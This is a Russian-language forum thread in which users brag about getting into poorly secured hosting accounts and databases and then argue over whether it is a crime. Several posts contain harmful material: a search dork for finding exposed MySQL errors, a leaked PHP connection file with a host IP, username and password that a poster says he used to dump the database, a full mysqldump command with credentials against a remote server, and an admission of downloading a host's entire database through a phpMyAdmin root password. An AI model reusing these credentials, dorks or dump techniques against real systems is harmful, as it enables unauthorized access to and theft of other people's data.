Только не падайте со стульчика

[rudik]

По поводу iname.com.ua у меня как-то знакомый дал мне пароль доступа к их FTP, как раз на днях (это было, навернео, года два назад) попалась мне написанная Димой phpRemotrView. Когда я увидел все прелести ее использования, от восторга чуть не умер. И с единой мыслью "сейчас посмотрю как профи программируют" полез искать исходники на PHP. Восторг быстро прошел, потому что кроме html я нашел всего 10-15 сайтов использующих хоть какие-то CGI приложения, что составляло 3-5% всего хостинга. Причем учиться у тех программеров не то что было нечему, а их сакмих я мог уже тогда научить чему-то.

Признаюсь честно, ничего не ломал. Нашел phpMyAdmin в конфиге которого был указан рутовский пароль к БД. Скромно скачал всю БД, в которой единственными ценностями были подборка анекдотов на 3Мб, которая и сейчас у меня лежит и информация по зарегистрированным в iname доменам.

 

[rudik]

Хочу кое-что сказать тем, кто постит сюда ссылки. Не делайте ссылки активными, давайте их как текст. А то по REFERER быстро можно найти откуда ноги растут. Хоть законодательной базы по вопросу взлома еще толковой нет, а для постояльцев форума, это даже не взлом, а просто "кто виноват? Мы не виноваты что он плохо программирует, для нас это не взлом, а использование сайта...".

Для тех кто удаляет записи в базах: если вы такие крутые ломайте что-то более серьезное, например сайт белого дома и там стирайте уничтожайте, тогда вас действительно будут называть хакерами, а то что вы "мелочь по карманам тырите" это не показатель крутизны, да еще и по чужим ссылкам. Если хотите афтограф оставить, допишите в БД что - то свое, но и оставте возможность начинающему программисту восстановить эту БД.

 

[rudik]

http://www.yandex.ru/yandsearch?text=%22Using+password:+NO%22&tb=1

 

[young]

http://www.omaadmin.co.uk/php_generic_includes/db_connect.inc

<?php
//--------------------3.1-----------------------------------------------------------
//this is currently set to connect the easy space mysql server
	$db = mysql_connect("217.72.163.36", "jxjcom01", "bx6524");
	mysql_select_db("jxjcom01", $db) or die ("Could not select db");

?>

С такими настройками у меня получилось сделать connect и слить бд

 

[rudik]

mysqldump --password=om268456 -u mercadoaovivo -h 200.155.15.13 mav > /home/rudenko/mav.sql

10 метров полной фигни

 

[rudik]

Многих героев спасает то что у них пользователи только от localhost работают.

 

[Yurik]

Многих героев спасает то

у большинства героев а локале бегает майадмин

кроме html я нашел всего 10-15 сайтов использующих хоть какие-то CGI приложения

на сегодня больше, там баз данных только больше 100 было

Мы не виноваты что он плохо программирует, для нас это не взлом

взламывать их никто не взламывал, а публикация в СМИ (гугл, рамблер) собственных дыр это провокация.
Чтобы была за такие вещи какая-то ответственность нужны четыре вещи:
1. Неправомерное деяние (тяжело назвать неправомерным вход по ссылке в гугле)
2. Ущерб (это к тем кто удаляет записи в БД которая не имеет бекапа)
3. Вина
4. Наличие причинно-наследственной связи между 1. и 2.

 

[rudik]

Автор оригинала: Yurik
у большинства героев а локале бегает майадмин

Я думаю он у всех так работает, просто его не всегда удается обнаружить или же он просто не установлен на хостинге. Если бы он стоял на хостинге, то не составило никакого труда бы скачивать БД пользователей, которые работают с localhost'a

 

[young]

2. Ущерб (это к тем кто удаляет записи в БД которая не имеет бекапа)

А если чистить БД к которым есть бекап, это не уголовно?!!!!

 

[rudik]

Автор оригинала: young
А если чистить БД к которым есть бекап, это не уголовно?!!!!

Если стрелять в человека, с учетом того, что его после этого вылечат?

Бездействие в некоторых случаях тоже уголовно наказуемо.

 

[MD]

Народ, какая уголовная отв. ???
Вы школьников 13-14-15 летних сажать собрались, которые смотрят сюда читают и кликают на ваши линки ? и потом получив свободу почуйствовать себя хаксорами трут до мазолей на руках ..

 

[Frenk]

Читайте:
УК - http://belhost.by/info.phtml

 

[Эмиль]

Человек должен понимать что он делает, когда мне было лет 12, я уже понимал, что если сопру парольи логин у своей соседки по парте(а мне было расплюнуть это сделать), то ко мне тут же дяти в синем войдут
Реально какой толк базы долбать? Найдут уши оторвут